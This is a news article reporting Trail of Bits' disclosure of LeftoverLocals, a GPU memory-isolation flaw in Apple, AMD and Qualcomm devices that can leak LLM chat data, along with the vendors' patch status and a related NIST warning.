Artificial Intelligence & Machine Learning , Next-Generation Technologies & Secure Development

Popular GPUs Used in AI Systems Vulnerable to Memory Leak

LeftoverLocals Affects Apple, AMD and Qualcomm Devices
Popular GPUs Used in AI Systems Vulnerable to Memory Leak
Researchers from Trail of Bits said they can reproduce LLM chat sessions through an attack on a GPU. (Image: Shutterstock)

Researchers uncovered a critical vulnerability in graphic processing units of popular devices that could allow attackers to access data from large language models.

See Also: Solving business challenges with data & AI: 5 insights from C-suite leaders

The flaw, dubbed LeftoverLocals, affects the GPU frameworks of Apple, AMD and Qualcomm devices. Researchers at security firm Trail of Bits, who uncovered the flaw, said it stems from how the affected devices don't isolate kernel memory, allowing an attacker to simply write GPU kernel code to prompt the targeted devices to dump data from memory.

To orchestrate the hack, the researchers used llama.cpp, Meta's open-source LLM model, on AMD Radeon RX 7900 XT GPU. They also used open-source programming language OpenCL to compile two kernel programs dubbed Listener and Writer.

Writer enabled the researchers to store buffer overflows in local memory, and Listener read uninitialized local memory. When the researchers ran the two programs, they prompted the target device to dump leftover memory from the LLM application.

The researchers said they had been able to access 181 megabytes of LLM query and that the tactics can allow attackers to reproduce chat sessions and grant access to model parameters and outputs - increasing the overall threat vector to LLM models.

"Implementing these attacks is not difficult and is accessible to amateur programmers," the researchers said. They said open-source LLMs are particularly susceptible to the vulnerability, as parts of the machine learning stacks are not "rigorously reviewed by security experts."

Apple rolled out limited patches for the flaw, while Qualcomm and AMD said they are continuing to evaluate the vulnerability, according to the researchers.

The warning from the Trail of Bits researchers roughly coincides with an alert from the U.S. National Institute of Standards and Technology saying that generative AI systems continue to remain susceptible to prompt injection and data leak threats due to the complexity in their software environment (see: NIST Warns of Cyberthreats to AI Models ).

"Because the datasets used to train an AI are far too large for people to successfully monitor and filter, there is no foolproof way as yet to protect AI from misdirection," NIST said.


About the Author

Akshaya Asokan

Akshaya Asokan

Senior Correspondent, ISMG

Asokan is a U.K.-based senior correspondent for Information Security Media Group's global news desk. She previously worked with IDG and other publications, reporting on developments in technology, minority rights and education.




Around the Network

Our website uses cookies. Cookies enable us to provide the best experience possible and help us understand how visitors use our website. By browsing govinfosecurity.com, you agree to our use of cookies.